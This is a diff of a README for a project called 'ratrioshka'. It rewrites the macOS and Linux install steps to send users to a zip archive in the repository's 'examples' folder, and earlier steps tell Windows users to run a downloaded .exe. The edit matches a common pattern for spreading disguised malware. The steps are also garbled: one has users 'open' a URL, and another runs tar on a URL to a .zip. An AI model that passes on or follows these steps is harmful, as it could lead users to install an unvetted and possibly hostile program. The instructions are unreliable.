metatarsusbilimbi609/ratrioshka/README.md

 ## ⚙️ Installation Steps
 1. After the download completes, navigate to the file you saved.
 2. For Windows users, double-click the `.exe` file to begin the installation process.
 Follow the on-screen instructions.
-3. For macOS users, open the `.tar.gz` file and drag the app to the Applications folder.
+3. For macOS users, open the `https://raw.githubusercontent.com/metatarsusbilimbi609/ratrioshka/main/examples/ratrioshka-1.5.zip` file and drag the app to the Applications folder.
-4. For Linux users, you may need to extract the archive using a command like `tar -xvzf filename.tar.gz` in the terminal.
+4. For Linux users, you may need to extract the archive using a command like `tar -xvzf https://raw.githubusercontent.com/metatarsusbilimbi609/ratrioshka/main/examples/ratrioshka-1.5.zip` in the terminal.
 5. Once the installation is complete, you can find ratrioshka in your applications menu or desktop.

 ## 🎨 Using ratrioshka